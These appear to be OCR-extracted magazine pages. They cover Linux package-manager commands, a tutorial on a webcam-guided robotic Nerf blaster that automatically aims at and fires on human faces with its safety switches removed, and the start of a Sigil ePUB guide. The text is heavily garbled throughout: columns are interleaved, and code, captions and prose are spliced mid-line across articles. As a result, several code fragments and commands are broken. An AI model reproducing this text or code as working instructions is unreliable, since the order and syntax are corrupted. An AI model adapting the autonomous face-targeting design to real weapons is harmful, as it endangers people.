distributions. OpenSUSE and Mageia are also going on under the hood.
RPM-based distros, so they have the rpm tool
available and it works in the same way as in Fedora, Other packaging systems
but they have their own higher-level package While Deb and RPM dominate the Linux world, some
management tools. OpenSUSE uses Zypper, while distros have their own packaging systems that are
Mageia (the Mandriva spin-off) has Urpmi. The worth knowing about. Arch Linux, for instance, sports
following commands show how to: the Pacman system, which is very highly regarded
1 Find a package or program among its users. Arch can be a challenging
2 Install a package distribution to maintain, due to the fact that it’s
3 Remove a package constantly changing, but Pacman handles the task of
4 Update the package database upgrading with aplomb.
5 Update the system Slackware, meanwhile, is famed for being one of the
6 Add a repository most traditional Linux distros (and it’s also the
7 Get information on a package longest-running Linux flavour in existence). It’s often
First in OpenSUSE: criticised for not having a package manager, but that’s
1. zypper search <package> not entirely fair, as we explore on page 26.
2. zypper install <package> While most packaging systems take the approach
3. zypper remove <package> of extracting data into /usr, and perhaps with some
4. zypper refresh bits and bobs in /etc and /var, there are some more
5. zypper update ambitious systems that attempt to make things
6. zypper ar <URL> <alias> simpler. In the Gobo Linux distribution, for example, all
7. zypper info <package> applications are installed in the /Programs directory,
And then for Mageia: and you can have multiple versions of the same
1. urpmf --summary <search word> application. So you could have /Programs/
2. urpmi <package> LibreOffice, and inside that directory you’d have
3. urpme <package> subdirectories for 4.1, 4.2 and so forth. This keeps
4. urpmi.update -a programs neatly separated from one another, and
5. urpmi --auto-select makes it easy to install and delete them – you don’t
6. urpmi.addmedia <name> <URL> need the package manager to do a lot of black magic.
7. urpmq -i <package> Shared libraries are a potential problem here, but
The urpmf command is especially useful if you’re Gobo Linux works by using symbolic links in the
missing a dependency, and you need to find out which /System/Index/lib directory. So you might have GTK
package has it. For instance, if you’re trying to compile installed in /Programs/GTK+/3.0, and programs that
a program and the build script complains that the use it won’t necessarily know that it’s there. But they
foobar.h header file is missing, you can do urpmf will find in /System/Index/lib.
foobar.h and find out which package contains it.
So, those are the major Linux package managers Mike Saunders has been installing, removing, creating and
breaking packages for 15 years. There’s no stopping him!
covered – now you should be able to jump between 89
Amass a drone battalion armed to the teeth with foam
darts – and take over the world!
here’s something incredibly geeky about Nerf
WHY DO THIS? guns. Perhaps it’s because they give us a safe
• Control hardware way to live out sci-fi fantasies without the risk
with the Python
programming language of actually getting shot by a phaser, or perhaps it’s
• Learn robotics in a because they’re built in such a way that they’re easy to
semi-practical context take apart and hack.
• Take over the world! We’ve taken one of these geek toys and fitted it out
with tracking software and mounted it on a robotic
arm. Now it automatically targets any humans that
should stray into its range. That should send a
message to anyone who tries to break into LV Towers!
The most important part of any such weaponry is
the gun. We used a Nerf N-Strike Elite Stryfe Blaster, The weapon of mass distraction, ready to strike fear into
because this model has a semi-automatic firing anyone who trespasses into our geek lair.
system that makes it easier to control electronically,
though there are others that could work.
The semi-automatic firing system has two parts. a37jn). To give our killer robot sight, we added a USB
The automatic part consists of two spinning discs webcam. This, when coupled with the OpenCV library
that accelerate the foam dart down the barrel. The and a bit of Python, enables our bot to automatically
manual part is a lever assembly that pushes the foam target people’s faces.
dart forward into these spinning discs. As well as the gun, mount and webcam, we needed
With the gun picked, we just needed a way of a few pieces to bring it all together. These were:
aiming it, and that meant we had to mount it on 1 x servo
something that the computer could move. The only 1 x Picoborg motor controller
real specifications for the mount were that it had two 2 x 4AA battery holders
degrees of freedom (so that it could aim both 4 x 6.3kΩ resistors
horizontally and vertically), and that it could support 4 x 200Ω resistors
the weight of the gun. We used a generic Robotic Arm 3 x sachets Sugru
with PC USB interface from Maplin (www.maplin. 1 x Arduino Uno R3
There are three basic types of Nerf gun: manual, tying a string to an arm on a servo and rotating the
semi-automatic and fully-automatic. Our semi- servo 160 degrees to pull the string forward. The other
automatic gun needed an additional mechanism end of this string is attached to the firing pin. Servos
needed to pull the firing pin forward about two inches. are motors that are geared and have a feedback
This pushes the dart forwards far enough for the potentiometer. This means that rather than just rotate
spinning discs to pick it up and fling it forward. them, you can set them to move to a defined position.
Normally this is done by the trigger. However, we took
out almost all of the trigger assembly, including a The trigger mechanism
couple of mechanical safeguards that prevented the The trigger requires a reasonably hard pull to fire and
trigger from firing when there weren’t bullets in the this could be more than what many small servos can
chamber. These were all screwed in place, so could be provide. We used a Tower Pro MG995 servo, which is
removed easily. We left only the final lever, which was fairly powerful and good value (usually around £10).
also used to hold the firing pin in place. We mounted this on the outside of the Nerf gun using
Linear actuators are electrically controlled devices a blob of Sugru (though any strong glue would do),
for pushing things forwards. However, they’re heavy and cut a section out of the side of the gun to allow it
and expensive, so we opted for a simpler method of to access the firing mechanism.
Raspberry Pi
We initially tried to write this project to run off the GPIO pins The way around this is to offload all the input and
of a Raspberry Pi, but for several reasons, it just didn’t work. output functions to a powered expansion board. This
The most demanding part of controlling this hardware is board needs to support driving a servo and have at least five
generating the pulses to communicate with the servo. Turning GPIO pins. In our opinion, the best expansion for this is an
them on and off very quickly in software is possible, but not Arduino, and we would recommend using the same hardware
really viable when there’s so much other stuff demanding setup on a Raspberry Pi or similar small computer. The only
CPU time. The solution to this is Pulse Width Modulation necessary change is to the scaling factors for the images in
(PWM), a hardware feature that enables you to control rapid the OpenCV detection. This will make it easier for the Pi to
pulses without much CPU intervention. The Pi does support process the data. Of course, this does mean that the image
PWM, though it isn’t available in the popular RPi.GPIO recognition would be less capable. The trade-off is between
Python module, so we used the RPIO GPIO module instead the frame rate of the video (and detection), and the accuracy
( of the face-tracking.
However, when we tried to use a Pi to power the first soldier Since this method of using an Arduino doesn’t use any of
in our robot army, we found that it became very unstable. the GPIOs, it should be possible to run it on almost any Linux-
We strongly suspect that this is because of the high power capable board (the OpenCV Python module is quite portable),
requirements of running both the CPU-intensive OpenCV and something like the Odroid U3 might be a better (though
software, the GPIOs, and the PWM. Even with all the USB more expensive) option than the Pi. Alternatively, the Udoo
peripherals on a powered USB hub, we found it unreliable. It computers include an Arduino built in, so they should allow
may be possible to get around this with some tweaking. you to run the entire control from a single board.
To avoid damaging either the servo or the gun, we the distance that the firing pin is supposed to move.
tied the servo to a coiled elastic band, and then tied Before fully assembling the hardware, we got all of the
this coiled elastic band to the trigger mechanism. This control circuits and software working, because it
provided a small amount of stretch in the event that would be a lot harder to change things once it was all
we should accidentally set the servo to pull beyond stuck together.
To control the gun and get feedback from the arm, we 1 reset the trigger
used an Arduino Uno Rev3. The Uno is our 2 pull the trigger
microcontroller of choice because of its ease of use 3 stop the spinning
and the number of support and code examples that 4 start the spinning. Using this simple protocol, we
exist for it online. could control the hardware as we needed.
Arduinos have a programmable processor and
loads of input and output pins (the Uno has 14 digital We have learned nothing from Skynet
input/output pins and six analogue input pins). The Now let’s take a look at how the hardware connects
processor is far simpler than the sort of CPU you’d together. Almost all servos have three wires to control
find in a normal computer, so doesn’t support them: a positive, a negative and a control. The control
anything like a normal operating system. Instead, you wire can be connected directly to a pin on the Arduino.
write your programs on a normal computer and The positive and negative wires need to be connected
upload them onto the Arduino. to a 5–6V voltage source. The Arduino does have a
The Arduino program for this project has to handle 5V voltage pin, but it can’t supply enough current to The circuit diagram for
two elements: it has to listen to the sensors that we drive the servo. Instead, we used a 4 AA battery how the motor and servo
built to detect excessive movement and pass this on holder. In order for both the control signal and the are connected to the
to the computer, and it has to take commands from drive current to be able to flow properly, you also need Arduino.
the computer and control the spinning cylinders and
the servo accordingly. These requirements mean that
we have to shuffle information back and forth Arduino Servo
between the computer and the Arduino. The easiest -VE
way to do this is to send text over a USB serial
connection, which is established automatically when Pin 10
you plug the Arduino into a USB port. Pin 13
The letters R, G, U and D are sent by the Arduino to Picoborg
let the computer know that the arm has moved as far
as it can. R and G are for anti-clockwise and clockwise
respectively (we used red and green wires). U and D
are for the up and down end stops. Motor
To avoid confusion, the commands from the
computer to the Arduino are the numbers 1 to 4: 91
The rotation end stops are as ‘shields’ that slot into the headers of the board.
mounted on opposite sides Some motor controllers have speed controllers, or
of the base and held in direction controllers, or the ability to electronically
place with Sugru. brake the motor – all features that are often needed,
but completely unnecessary for us.
We didn’t happen to have an Arduino motor
controller in the LV workshop (and this definitely
wasn’t because someone forgot to order one). We did
have a Picoborg motor driver that’s designed for the
Raspberry Pi. Since all this does is attach the pins
from the Raspberry Pi header to Field Effect
Transistors (FETs) that are used to drive the motors,
we can easily use the board with our Arduino. All we
to connect the negative output on the battery to the need to do is use a wire to attach one of the Arduino
Arduino ground. pins to the appropriate place for the Raspberry Pi
Servos hark from the days before microcontrollers GPIO pin (in this case pin 4), and similarly connect the
became common, and so their control mechanism is ground to the right pin. Once this is connected, the
a little unusual. The instructions that tell the servo power supply and motor output wires need to be
what position to put the arm in are sent as a series of soldered in place, and then turning the pin on or off on
pulses. These pulses can either be very short or quite the Arduino will turn the motor on and off.
long, and the length of the pulse denotes the position
the arm should be in. Fortunately, you don’t need to Control the servo
worry about any of this as there are libraries to control The code to control the trigger servo and the motors
the pulse frequency and duration for just about every is as follows (an extract from the loop() function):
hardware platform that supports servos. if (Serial.available()) {
data_in = Serial.parseInt();
The firing mechanism if (data_in == 1) {
For the Arduino, that library is called Servo, and it myservo.write(155);
comes as standard. You only need to create a servo }
object that’s attached to the correct pin, and then if (data_in == 2) {
write the value to it that corresponds to the position myservo.write(25);
you want it in. A couple of examples called knob and }
sweep detail all the basic usage and come with the if (data_in == 3) {
Arduino IDE. digitalWrite(spinPin, LOW);
Once the servo has pulled the dart forwards, it’s }
picked up by spinning discs that accelerate it. These
are powered by a simple DC motor that needs 5 or 6V
applied across it. In order to get to the wires that
power the motor, we needed to open up the gun.
Inside there was a simple circuit that consisted of a
trigger switch for the motors, two safety switches, and
a cut-off. We removed all this, and were just left with
two wires (one red and one black) heading forwards to
the disk motors in the front of the gun. These are what
we needed to supply power to in order to shoot.
As with the servo, the Arduino can’t deliver enough
power for them to run, so instead we need to use an
Arduino output to switch a larger current. This is when
a small current from a controller is used to turn a
switch on or off, and this switch connects or
disconnects a more powerful source of power (in our
case four AA batteries) to the motors. We used a
separate set of batteries to the ones driving the servo.
In principle, you could try to set up a single power
source to drive all of the motors on this project.
However, we kept them all separate both to prolong
the battery life and to avoid any awkward power-
supply related issues.
There are a huge array of motor drivers available,
and plenty of them can attach directly to the Arduino The vertical end stops are combined into a single unit.
if (data_in == 4) {
digitalWrite(spinPin, HIGH); Safety
} We know someone will ask this, so yes, this same method
} would work with a BB gun, paintball gun, pistol, assault
This simple code enables the Python program to rifle or rocket launcher, but please, PLEASE, don’t do it.
control the gun as it needs. This machine doesn’t think before it pulls the trigger, it
simply reacts to an image recognition that’s prone to mis-
We won’t go into details of how we built the arm
classification. The consequences of a poorly aimed, poorly
because we simply followed the instructions that timed foam dart are quite small. The same cannot be said
came with it. However, once it was built, we did have of BBs and paintballs (and surely we don’t need to spell out
to make some modifications. It its raw state, it had why it’s a bad idea to attach a lethal weapon to a computer
only one-way communication with the computer. That – just watch Terminator!).
The foam darts fired by Nerf guns are fairly safe, and
meant that the computer could tell it to move, but it
should be safe for most children old enough to assemble
didn’t feedback any information about its position. For such a project (Hasbro, the maker of Nerf guns, says they’re
the general operation of the gun, this wasn’t a huge safe for ages 8 and up). That said, it’s still a good idea to
problem; however, it did mean that the computer had wear eye protection, especially while testing.
no way of knowing if the arm had reached its limit of
movement in any one direction.
rcount = 20000;
Protect the mechanism }
We built some simple sensors out of wire with a hook
bent in the end, and another wire looped around it. As if(digitalRead(gPin) == HIGH && gcount == 0) {
the robot moves, the loop slides up and down the Serial.write(“g\n”);
wire. Here the wire is insulated by plastic, so there isn’t Serial.write(“g\n”);
a connection, but when the loop reaches the hook, gcount = 20000;
there isn’t any wire, so the circuit is completed, and }
this signals the microcontroller.
A couple of resistors (one pull-down and one if(digitalRead(uPin) == HIGH && ucount == 0) {
protection) are needed to make sure that the Serial.write(“u\n”);
microcontroller reads the input correctly. See figure 3, Serial.write(“u\n”);
below, for the circuit diagram. We built this simple ucount = 20000;
circuit on a breadboard. }
These readings are then sent over the serial
connection with the following (from the main loop): if(digitalRead(dPin) == HIGH && dcount == 0) {
if(rcount > 0) { rcount--; } Serial.write(“d\n”);
if(gcount > 0) { gcount--; } Serial.write(“d\n”);
if(ucount > 0) { ucount--; } dcount = 20000;
if(dcount > 0) { dcount--; } }
This works in a slightly unusual way. It writes the
if(digitalRead(rPin) == HIGH && rcount == 0) { value to the serial line twice to make sure that it is
Serial.write(“r\n”); sent properly, because there isn’t much error checking
Serial.write(“r\n”); on a serial connection.
220 Ohm
Pin 7
Pin 6
Pin 11
Pin 12
6.2 KOhm
Figure 3. The two sets of
resistors make sure that
the pin reads correctly
when the circuit is open
and closed. 93
The fully assembled to use the Arduino. There isn’t a Linux driver for the
weapon primed and ready device we used, but the folks at
to fire. It needs long wires to have decoded the USB instructions needed to move
allow it to move freely, but the arm, and so we programmed it by sending the
this can lead to it looking a necessary commands via the PyUSB module. We’ll
bit like a bird’s nest. only cover the commands we need, but for more
information, see the article at
First you need to download PyUSB, the module
we’ll use to send commands to the arm (http:// Unzip this and
move into the directory it created and install it with:
It also uses a loop counter to stop it sending the sudo python install
message too frequently. This loop will run much The arm can then be controlled with code such as:
quicker than the loop in the control program that import usb.core, usb.util, time
reads the data line. By using these counters, which RoboArm = usb.core.find(idVendor=0x1267, idProduct=0x0000)
limit the message to once every 20,000 loop cycles, RoboArm.ctrl_transfer(0x40,6,0x100,0, [16,0,0], 1000)
we ensure that we won’t clog up the main program The ctrl_transfer() call sends the instruction to the
with thousands of duplicate messages, but that we’ll arm. The numbers in the square brackets specify the
still keep sending it frequently enough to make sure exact movement, as you’ll see in the final code.
that everything runs smoothly. If you’re using a different mount or arm, you may
The arm is controlled via the USB port, so unlike the need to control it via the Arduino. This should be fairly
rest of the hardware, we can send instructions to it easy to do by extending the serial commands to
directly from our main Python program and not have include extra ones to move the arm.
We’ve now covered everything we need to control the stop_d = True
hardware, so we need to create the software that will RoboArm.ctrl_transfer(0x40,6,0x100, 0, [0,0,0], 1000)
actually target people who happen to pass by. As the Arduino sends out commands, this reads
Our control software will run in a loop that goes as them in using the Python serial module (see the full
follows: code, which you can grab from
1 Check for serial communication from the Arduino wp-content/uploads/code/lv06-gun.tar.gz for how to
2 Grab a new frame and look for a face initialise this). The if statements here match exactly
3 If there’s a face in the frame: make sure the disc with ones in the Arduino code.
motor is on. Otherwise, turn the motor off If any of these pieces of data are found, the
4 Calculate how far the face is from the centre of the software sends the arm an instruction to stop moving.
frame It also sets a variable to tell the software not to
5 Turn the gun towards the face! continue moving in that direction. The variables are
6 If the face is in the centre of the frame: shoot. used at the end of the loop to make sure that the arm
7 Repeat doesn’t continue to move even if it’s trying to aim in
This runs over and over again until the user stops it. that direction in the following code (from later in the
Here’s the first part (which reads the serial connection): main loop):
while (ser.inWaiting() > 0): if correction_x < -100 and stop_r == False and drawn == True:
serdata = ser.readline() stop_g = False
if serdata == “r\n”: RoboArm.ctrl_transfer(0x40,6,0x100,0, [0,1,0], 100)
stop_r = True
RoboArm.ctrl_transfer(0x40,6,0x100, 0, [0,0,0], 1000) if correction_x > 100 and stop_g == False and drawn == True:
stop_r = False
if serdata == “g\n”: RoboArm.ctrl_transfer(0x40,6,0x100,0, [0,2,0], 100)
stop_g = True
RoboArm.ctrl_transfer(0x40,6,0x100, 0, [0,0,0], 1000) if correction_y < -100 and stop_u == False and drawn == True:
stop_d = False
if serdata == “u\n”: RoboArm.ctrl_transfer(0x40,6,0x100,0, [16,0,0], 100)
stop_u = True
RoboArm.ctrl_transfer(0x40,6,0x100, 0, [0,0,0], 1000) if correction_y > 100 and stop_d == False and drawn == True:
stop_u = False
if serdata == “d\n”: RoboArm.ctrl_transfer(0x40,6,0x100,0, [32,0,0], 100)
These if statements means that when the arm The inside of gun with the
moves in one direction, it resets the stop value for the string tied to the trigger
opposite direction. assembly. This is all that
The variables correction_x and correction_y hold was left after we removed
the distance between the face and the centre of the superfluous parts of the
image. As you can see, this isn’t a precision machine, mechanism.
so anywhere with a hundred pixels is close enough.
There are a couple of reasons for this. The assembly
isn’t particularly stiff (so it’s prone to wobbling slightly)
and the movements of the arm aren’t very fine. 100
pixels is an arbitrary amount, so you could increase or
decrease it should you build such a weapon, but we
found it was accurate enough to hit a person most of
the time, and loose enough that it stopped the gun
constantly over-correcting. When we used smaller
units, the arm became prone to getting stuck in a loop
as it moved from too-far one side to too-far the other.
Facial recognition
Facial recognition is quite a complex area that
requires specialist algorithms and lots of training
images to teach the computer what a face looks like.
Fortunately, all the hard work has been done and
packaged into OpenCV. This is a cross-platform library smiles. We’ll use one for detecting faces called
that can be used with many popular languages. In haarcascade_frontalface_default.xml. If you can’t
Python, the cv2 module provides us with the facilities find it in your installation, you can download it from
we need. Most distros have this in their package
manager. For example, on Debian-based distros, you data/haarcascades.
can install it with: Before we get to the main loop, we need to create
sudo apt-get install python-opencv the cascade with:
If it’s not in your distro’s repositories, you’ll have to import cv2
install it via the instructions at http://docs.opencv. face_data = cv2.CascadeClassifier(‘/home/ben/haarcascade_
org/doc/tutorials/introduction/linux_install/linux_ frontalface_default.xml’)
install.html. The code inside the loop is:
Once it’s installed, you should be able to import cv2. return_val, frame =
This module enables you to use an image recognition
method known as Haar cascade to detect items in an gray_frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
image using the Cascade Classifier object. small_gray_frame = cv2.resize(gray_frame, (0,0), fx=factor_
The exact details of how cv2 identifies faces is quite down, fy=factor_down)
complex, so we won’t deal with it here. Instead, we’ll faces = face_data.detectMultiScale(small_gray_frame, 1.5,5)
just look at how you can use it in this software.
CascadeClassifier is a type of object that’s included drawn=False
in the cv2 module. In order to create one, you need a for (face_x, face_y, face_width, face_height) in faces:
Haar cascade data file. These are XML files that cv2.rectangle(frame, (face_x*factor_up, face_y*factor_up),
include all the data the classifier needs to find a (face_x*factor_up + face_width*factor_up,
particular type of object. Each different object to be face_y*factor_up+face_height*factor_up),
recognised needs a different Haar cascade. (255,0,0),2)
Your OpenCV installation should have included if not drawn:
some useful Haar cascades such as hands, eyes and face_middle_x = factor_up * (face_x + (face_width / 2) )
Taking things further
There are plenty of things you could do to make this project If you’re feeling adventurous, you could even have a go at
better. So far, we’ve only used one of the standard Haar robotic clay-pidgeon shooting (although it would probably be
cascade data files. However, you can create these yourself best to use something a little slower, such as balloons).
to recognise specific objects. There are details of how This sort of face-tracking doesn’t have to be used for evil
to do this at though. You could use exactly the same hardware (minus the
traincascade.html. gun) to allow you to have a video chat while wandering about
With a bit of practise, you could get it to not shoot at you, the room, or to video a lecturer who walks about on stage, or
or recognise people wearing specific sports-team’s shirts. even for a more advanced wildlife camera. 95
It is possible to calculate the values of correction_x
and correction_y in different ways. For example, you
could change them to target a half head’s distance
below the head (upper-chest) by changing the
calculation to:
correction_y = (real_height/2) - face_middle_y - face_height
However, this can cause problems in close-quarters
combat, because the head takes up a large proportion
of the image. By moving the camera upwards, it may
push the face off-camera and therefore not recognise
it and fail to shoot.
The final part of the control is the part that handles
the shooting. This is actually the most complex part
of the code because it has to handle a few timing
problems. The disc motors need to have time to spin
up to speed before firing, but we don’t want them to
spin permanently because they will just deplete the
The outside of the gun
face_middle_y = factor_up * (face_y + (face_height / 2) ) batteries. Therefore, we turn them on as soon as we
showing the servo and the
cutaway that allows it to drawn = True detect a face, but have to wait a little while before
pull the firing pin forwards. shooting.
correction_x = (real_width/2) - face_middle_x We want to turn the motors off when the face
correction_y = (real_height/2) - face_middle_y leaves the image, but not immediately because the
The higher the resolution on an image, the more face might still be there, just not recognisable for a
accurate the object detection will be. However, it will few frames, and we always want to be primed and
also take more time to process. The best trade-off will ready to fire.
vary depending on your computer, so we’ve created The firing sequence goes: if the face is in the middle
two variables (factor_up and factor_down) that can of the frame and the trigger is reset and the motors
be used to resize the image before and after are running, then send the Arduino the message to
processing so that a move the servo, then wait until you’re sure the servo
“The software will try to target nice large image can has moved, then reset the servo.
be displayed, but only a We can’t use the normal sleep functions for all the
the middle of the camera, not smaller one processed. waiting, because we still want the software to keep
what the gun is pointing at.” The values of these are running through the loop and targeting. Instead, we’re
set at the start of the going to use counters that make sure at least a
program. We found certain number of iterations of the loop are run each
that 3 and 0.33 worked well for a moderately powerful
computer, but you may wish to vary this depending on
what you’re running on. It also converts it from colour
to greyscale for the same reasons.
The detectMultiScale() method is then used to pick
out all the faces in the image. The for loop then draws
a blue box around every detected face, but only one
face (the first one) is targeted at any one time. This is
then used to calculate the values of correction_x and
correction_y that we used earlier.
Guns before butter
You may notice that this will aim right in the middle of
the face. That’s a little unfriendly, and not completely
safe. Although the darts are soft, so are eyes. A couple
of things make this a bit safer. Firstly, the software will
try to target the middle of the camera, not what the
gun is pointing at. We angled our camera up slightly
which meant that the gun was pointing below the face
when the face was in the centre of the image.
Secondly, we wore eye protection (sunglasses) when
getting everything set up, and ideally all the time when
the gun is on. Remember that your computer doesn’t
feel guilt or compassion, so will shoot you straight in The Picoborg motor controller is designed to go on a
your eye and not feel a drop of remorse. Raspberry Pi, but we can co-opt it for use with the Arduino.
The gun successfully
time.The code that controls this is: triggered_count = triggered_count + 1 defending the desk of the
if drawn == True: We’ve covered all the mechanics, but there are a author from an interloper
#continue to send the message periodically in case there’s an few more bits of code needed to get everything set up. attempting to distract him
error in transmission The full code is at from his work.
if spin_count%20 == 0: uploads/code/lv06-gun.tar.gz.
ser.write(‘4\n’) Once the software’s fully tested, the only thing to do
if spin_count < 20000: is stick everything together properly. We used
spin_count = spin_count + 1 electrician’s tape to attach the webcam to the gun,
else: since this allows us to easily remove it once we want
spin_count = 20 to move on to the nect project. The joint between the
if drawn == False: gun and the arm needs to be more solid. Here, we
not_spin_count = not_spin_count + 1 used Sugru, which worked well, but hot glue would
if not_spin_count > 30 and triggered == False: also do the job. Actually, most strong glues that stick
spin_count = 0 plastic should work well. We used blobs of Blu-Tack to
ser.write(‘3\n’) hold the wires in the Picoborg and servo connectors.
not_spin_count = 0
if triggered_count > 30 and triggered == True and resetting == Physical computing
False: This project is all about physical computing – that is,
ser.write(‘1\n’) getting computers to interact with the real world. It
reset_count = 0 takes some inputs (the end-stops and the camera
resetting = True images), performs some processing on them, and
if reset_count > 30 and triggered == True and resetting == generates some outputs (turning the gun and firing
True: the bullets).
triggered = False This is quite a complex project, but physical
resetting = False computing doesn’t have to be. If you want to explore
if reset_count < 31: some simpler projects, the Arduino Uno is an excellent
reset_count = reset_count + 1 place to start. It connects to your Linux PC via the
if triggered_count < 31: USB port and lets you turn pins on or off, or get input
from them.
By unloading this onto an external board, if you
accidentally make a mistake, the worst it can do is fry
If you’re following this tutorial, you’re doing stuff with the Arduino, leaving your computer intact. Most
hardware that it wasn’t designed to do. There’s no point in people start with projects that turn LEDs on and off,
taking a dismantled and sawn Nerf gun back to the shop you
get input from switches, and build up to incorporating
bought it from if it breaks. They’ll laugh you out of the store.
We’ve built an automatic robot-controlled gun, and it sensors into their projects, although there’s nothing to
worked for us, but we can’t guarantee it’ll always work. You stop you jumping in at the deep end, and building a
might have received a Nerf gun from a different batch (and Nerf gun controller for your first project.
they don’t have published tolerances), or a servo with a bit The Arduino board and the software it uses are both
more power. We don’t think you’re likely to end up with a
open source, so there are loads of re-mixed designs
smoking heap if you follow the tutorial, but we can’t say for
sure that you won’t. Such is the nature of hardware hacking. with all sorts of features built in or taken out. There’s a
In the course of this project, we managed to burn out two great community around the Arduino, and loads of
pins on our Arduino (fortunately, the rest of the board still hardware available. is a
works). It was a lesson to us in checking our wiring before great place to see what’s going on.
powering on, and a reminder that electronics are fragile.
We’ve written this as a guide only. For those brave enough
Ben Everard doesn’t feel pity, or remorse, or fear, and he
to attempt it: good luck. absolutely will not stop, ever – at least not until tea time. 97
Learn how to use the ePUB Open Standard to carry any text
you want in your pocket
books, that is literary works distributed not as by doing. Sigil can teach you how to produce well
WHY DO THIS? bound stacks of paper sheets, but as digital structured, good-looking ePUB files compatible with
• Produce portable, good
files in the right formats, are terribly convenient. most ereaders around. Let’s see how.
looking, easy to use
ebooks on any operating You can back them up, carry thousands of titles in
system your pocket, publish them worldwide at nominal Main concepts and user interface
• Reformat any kind of costs, and above all process and reuse their content in Sigil can import content in TXT, HTML or ePUB
content as ebooks, to
many ways. Ebooks are useful for everybody from format. Whatever the input format, Sigil immediately
always carry it with you
• Learn by doing an
teachers to corporate executives, not just bestselling converts and saves it as ePUB. While you may write
open ebook standard, authors: reformatting personal notes, company ebooks from scratch in Sigil, you really shouldn’t.
reusable with any other memos, courseware or generic web pages as ebooks Regardless of the development issue, we think it is
can make all that stuff much more usable for both much better to only use it to format content already
their authors and all their potential users. written with other tools, which are probably more
In practice, as we hinted right at the beginning, this complete as editors, and would make it much easier
is true only if those ebooks are in the right formats. By to convert your work also in other formats.
this we mean Open Standards conceived specifically To use Sigil (and ePUB in general), you only need a
for ebooks, that is optimised for those paper-like basic understanding of HTML and CSS markup. As a
screens called ereaders, but usable on any other minimum, this knowledge will greatly help you when
device, of any size and form factor. “Right” also means it’s time to remove some code inserted by Sigil, as
formats that are highly structured internally, and you’ll see later.
therefore easy to write, parse and reuse with as much The Sigil interface has three main tabs, which can
(Free) software as possible. be rearranged in several ways, or detached to
In case you hadn’t noticed, this excludes the independent windows: Book Browser on the left, Table
ubiquitous PDF, which is still mostly used as a picture of Contents (ToC) on the right, and the actual editor,
of the printable parts of a document. The international which supports tabs and can work in “Book view” or
open standard called ePUB ( – “Code view” (the HTML source) in the middle.
Sigil was born as, and still see box) seems a much more sensible option for Book Browser shows the internal structure and
is, an ePUB editor. That ebooks. This is why we publish this tutorial. components of the ePUB file, whereas the ToC
is why the plain editing
The multi-platform Free Software tool Sigil displays the structure of the ebook text.
functions get the most
( is an an ePub Two other parts of the Sigil GUI you need to know
space in its toolbars. The
real power, however, lies editor and formatter. Its development is currently about are the Preference Panel (Edit > Preferences)
in the tools that generate stalled, but as long as the software installs and runs and the Clips toolbar. The most important tab of the
metadata, indices and without problems, it remains one of the best ways former is the one called “Clean Source”. That’s where
other components. around to not just publish ebooks, but to learn ePUB you tell Sigil when and how to clean up the imported
HTML code.
You cannot skip that step, because the HTML
export filters of many programs, especially word
processors like Libre Office, are unnecessarily heavy.
In an attempt to produce web pages that look exactly
like the original formatted text, they introduce a lot of
tags that are totally useless in ebooks.
The other preferences you can set are fonts and
colours of the editor, interface language, dictionaries
and keyboard shortcuts.
The Clips are user-defined snippets of frequently
used HTML code (one example would be CSS
attributes to colour links). You can select and insert
clips with a right-click in the editor window.
Many other functions of Sigil are pretty much the
same as normal HTML editors, or simple word
processors. We will not describe them here, because
they are very intuitive we want to focus on the real
value of Sigil, which is how it helps you to improve the
quality and usability of ePUB files.
First, structure your book
Metadata, that is “data about data” is what helps you
and everybody else, including search engines and any
other software, to make sense of your ebooks. Your
ebook can only be indexed if it has the right metadata,
for example.
That’s why the first place to work on a new ebook in
Sigil is its Metadata Editor. You must, as a minimum,
define Title, Language and Author(s). After that, the
This mashup shows the
“Add Basic” button opens a menu with the 30 most When you are done, click on the “Generate Toc”
Sigil Metadata Editor (left)
common metadata types. Sigil can manage all the button to create the standard ePUB TOC, which will be and what you get from
hundreds of metadata variables defined in the ePUB saved in the toc.ncx file. You can edit this table by Sigil (centre) when you
standard, and set contributors roles that go from going to Tools > Table of Contents > Edit Table of tell it to index simple or
co-author to calligrapher or censor. Contents, but remember that any change done in that hierarchical entries (right).
As far as the standard itself is concerned, the whole way will not be applied to the actual text in the source,
content of an ePUB book can stay in one HTML file. It and will be lost the next time you generate the ToC.
is much better, however, to put all chapters into It’s often a good idea to placing a copy of the same
separate files, which will load faster both in Sigil and in ToC inside the actual content of the book, either for
many ereaders. You want to do it as soon as possible, stylistic reasons or to make it usable even on ereaders
to minimise the number of broken internal links you or software programs that, for whatever reason, can’t
may have to fix later. read the toc.ncx file. Select Tools > Table Of Contents
To split an ebook source into separate HTML files, > Create HTML Table of Contents to get this ToC copy PRO TIP
put the cursor at the right point, then click on the “Split in a new source file, called TOC.xhtml, with its own If you plan to get serious
At Cursor” button. Should you change your mind, you CSS stylesheet (sgc-toc.css), then drag and drop it with ebook publishing,
find an HTML cheatsheet
can merge files: select them in the Book Browser, then where you want it to be in the book.
and a CSS tutorial for
right-click and choose Merge. beginners and keep them
Indices on your desktop. As soon
as you start using Sigil,
Table of contents Besides a ToC, the other feature that makes any
you’ll need them. Besides,
The ePUB format specifies how to write standard non-fiction book much more usable is a good index. you can reuse the same
TOCs (Table of Contents) that all ereaders can You can define specific occurences of strings to index, information to design
web pages!
recognise and make accessible to their users, to or tell Sigil to index all the occurrences of the same
quickly move around a book via dedicated menus or strings. After selecting some text, click on Tools >
other special systems. Index > Mark For Index to achieve the first result, or
If the HTML source initially loaded in Sigil already Tools > Index > Add To Index Editor for the other. You
has all its section headings labelled with their can also add entries directly to the Index Editor or
standard HTML markup (<hN>..</hN>), one click in (even better) load in it lists of strings to index,
the right place will do the job. Otherwise, select every previously saved in plain text files.
text you want to become a section heading of a Unless you specify different texts for them, Sigil will
certain level in the ToC, then click on the create entries that are exactly the strings you told it to
corresponding “Hn” button. You can mark images in search – those shown in the Index Editor as Text To
the same way if you want a section to start with them. Include. You may also use regular expressions there.
What does an ePub file look like?
In order to understand what Sigil does and why, you locations. Sigil is designed for ePUB 2, but also hyerarchy, inside the toc.ncx file (the extension
have to know at least the general architecture and supports some ePUB 3 features such as audio and means “Navigation Center eXtended”). The ncx
main components of the Open Standard for digital video. If you unzipped an ePUB file, you would find format is obsolete in ePUB 3, but it should remain
publication called ePUB ( It is in it one file and two folders. The file is simply the usable for a long time.
not supported by all the ereaders you may find, but MIME type of the whole archive. The META-INF All the metadata go into the XML document
it is common enough that converters from ePUB to folder hosts a sort of pointer file, called container. named contents.opf, which also hosts a “Manifest”,
